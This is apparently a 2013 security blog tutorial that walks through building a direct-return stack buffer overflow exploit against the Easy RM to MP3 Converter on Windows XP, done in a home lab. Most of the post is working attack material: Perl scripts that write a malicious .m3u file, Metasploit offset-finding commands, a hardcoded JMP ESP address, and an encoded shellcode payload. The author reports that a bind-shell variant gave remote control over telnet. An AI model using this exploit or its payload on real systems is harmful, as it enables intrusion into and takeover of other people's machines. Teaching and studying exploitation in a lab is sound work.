Wednesday, 10 April 2013

Buffer overflow : direct return exploit

A buffer overflow occurs when more data are written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable results in a program. Buffer overflows happen when there is inproper validation (no bounds prior to the data being written. It is considered a bug or vulnerabilities in the software. Buffer overflow can be used to exploit the software to gain an access to the systems.
The are two methods to do buffer overflow to system's memory, the direct return exploit and SEH based exploit.
Direct return exploit is the process to overflow buffer memory and overwritten the EIP register so the system crash and can be exploited.
SEH based exploit is using SEH(Structured Exception Handling) to handle the exception. When the system is overflow by certain data, the SEH will handle the overflow so the memory 's register location can't be read and can't be exploitted directly.

And in this post I will write about the first method, the direct return exploit. The software that will be used as a sample is “easy RM to MP3 Converter” installed on my lab. The tools that I use :
  1. backtrack 5
  2. metasploit framework
  3. lab (Windows XP SP 2 in virtualBox)
  4. fuzzer data in perl
  5. easy RM to MP3 converter application
  6. OllyDbg application

here's the steps :
1. run windows XP in VirtualBox
2. install and run easy RM to MP3 converter that will be used as a target.

3. send the fuzzer to find the vulnerabilities of target. Fuzzer is data contains large amount of character can can cause the system crash.
4. Create a fuzzer in perl and compile as an audio file. I named it song.m3u
my $file= "song.m3u"; 
my $junk = "\x41" x 25000;
my $junk2 = "\x42" x 5000;
open($FILE,">$file");
print $FILE $junk.$junk2;close($FILE);
print "m3u File Created successfully\n";
5. load a fuzzer at the target

6. if the target is not crash, increase the character number in fuzzer program. If the target crash means 
that the target is vulnerable and can be exploitted.

7. Open the ollyDbg to know what can cause the target crash

8. attach and run application target to the ollyDbg

 9. again, load fuzzer to the target, and the target will crash

10. look in top right in OllyDbg in EIP register content. The EIP contain 42424242, and ESP contain 
BBBBBBB, byte from fuzzer file. it means that the EIP has been overwritten by the fuzzer

11. to know the byte position of the EIP, edit the fuzzer file. replace the 5000 x B with pattern created from metasploit pattern_create.rb
    ./pattern_create 5000

12. copy the pattern to fuzzer code and compile and load again at target. Look at EIP register content. The content is 366B4235. 

 To know the position of the pattern use the pattern_offset.rb from metasploit
./pattern_offset.rb 366B4235


the offset is 1097. it means that the EIP start from 25000+1097 from the fuzzer byte. now edit the fuzzer again and now looks like this :
my $file= "song.m3u";my $junk = "\x41" x 26097;
my $eip = "BBBB";
my $esp = "\x43" x 1000;
open($FILE,">$file");
print $FILE $junk.$eip.$esp;
close($FILE);
print "m3u File Created successfully\n";
compile and load at the target from ollyDbg. Now the EIP is contain BBBB and ESP contain CCCCCCCCCC. 

 It means that the location of EIP is known, and now I will try to find the first location of ESP.
13. edit the fuzzer again with the following code :
my $file= "song.m3u";
 my $junk = "\x41" x 26097;
 my $eip = "BBBB";
 my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" . "5ABCDEFGHIJK6ABCDEFGHIJK" .
 "7ABCDEFGHIJK8ABCDEFGHIJK" .
 "9ABCDEFGHIJKAABCDEFGHIJK".
 "BABCDEFGHIJKCABCDEFGHIJK";
 open($FILE,">$file");
 print $FILE $junk.$eip.$shellcode;
 close($FILE);
print "m3u File Created successfully\n";

14. compile and load at the target. Look at ESP register. ESP register contain byte from DEFGHIJ..., not from 1ABCDE... 

 it means there are 4 byte space between EIP and ESP.

15. now edit again the fuzzer with the following code :
my $file= "song.m3u";
 my $junk = "\x41" x 26097;
 my $eip = "BBBB";
 my $space = "XXXX";
 my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK" . "5ABCDEFGHIJK6ABCDEFGHIJK" .
 "7ABCDEFGHIJK8ABCDEFGHIJK" .
 "9ABCDEFGHIJKAABCDEFGHIJK".
 "BABCDEFGHIJKCABCDEFGHIJK";
 open($FILE,">$file");
 print $FILE $junk.$eip.$space.$shellcode;
 close($FILE);
 print "m3u File Created successfully\n";
16. compile and load again to the target. Now the ESP is start from the 1ABCDEF.... and the ESP starting address is 000FF73. This address will be used to points to the payloads.
17. now edit the fuzzer again and build a shellcode with the following code :
my $file= "song.m3u";
 my $junk = "\x41" x 26097;
 my $eip = pack('V',0x000ff730);
 my $shellcode = "\x90" x 25;
 $shellcode = $shellcode."\xcc";
 $shellcode = $shellcode."\x90" x 25;
 open($FILE,">$file");
 print $FILE $junk.$eip.$shellcode;
 close($FILE);
 print "m3u File Created successfully\n";

18. run the application and load the fuzzer. Now the EIP address is same as ESP address, it means that the EIP get the address from ESP.

19. the next step is find the command called JMP ESP to put into EIP register. So when application first run will go into EIP, and then EIP will jump into ESP, and in ESP the payload is already to be executed.

20. how to find JMP ESP? First open the application with OllyDbg. In menu view > executable modul and double click in shell32.dll module. 
Right click in command lists and choose search for > command and type JMP ESP.


then I get the address of the JMP ESP command. The address is 7ca58265


21. now the information is completed and ready to put the payload. Generate the payload using metasploit msfweb (/pentest/exploits/framework2/msfweb). Open the web browser and type 127.0.0.1:55555 to access the msfweb. Choose menu payloads > windows execute command. Fill in the form like picture below and click generate payload. in this case i will call calcuator via command line :



21. copy the payload code to the fuzzer file. Now the code looks like :
my $file= "song.m3u";
 my $junk = "\x41" x 26097;
 my $eip = pack('V',0x7ca58265);
 my $shellcode = "\x90" x 25;
 $shellcode = $shellcode. "\x31\xc9\xda\xcf\xd9\x74\x24\xf4\xbb\x59\x1d\x52\xd1\xb1\x23\x5f". "\x83\xef\xfc\x31\x5f\x11\x03\x06\x0c\xb0\x24\x44\xc6\x70\xc7\xb4". "\x17\xf2\x82\x88\x9c\x78\x08\x88\xa3\x6f\x99\x27\xbc\xe4\xc1\x97". "\xbd\x11\xb4\x5c\x89\x6e\x46\x8c\xc3\xb0\xd0\xfc\xa0\xf1\x97\xfb". "\x69\x3b\x5a\x02\xa8\x57\x91\x3f\x78\x8c\x5e\x4a\x65\x47\x01\x90". "\x64\xb3\xd8\x53\x6a\x08\xae\x3c\x6f\x8f\x5b\x49\x93\x04\x9a\xa6". "\x25\x46\xb9\x3c\xf5\x46\x01\x58\x72\xe8\xb1\x25\x44\x91\xbd\xae". "\x05\x6e\x35\xc0\x99\xc3\xc2\x48\xaa\xf0\xdc\x03\x2a\xb6\xdf\x13". "\x2b\x3c\xb7\x2f\x74\x73\xbe\x2f\xdc\xfa\xc6\x2c\x20\x87\x66\x5a". "\xdf\xa0\x65\xe9\x77\xc9\x94\x87\x86\xbe\x97\x70\xf5\x21\x04\x1d".
 "\xfa"; open($FILE,">$file");
 print $FILE $junk.$eip.$shellcode;
 close($FILE);
 print "m3u File Created successfully\n";

22. compile the code and load into the target, without using OllyDbg.

23. and voila! The calculator appear right after the target open the fuzzer file. And the system are successfully explioted.


24. I try change the payload with bind shell, and here's the result :



25. and now the system is completely controlled via telnet!

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)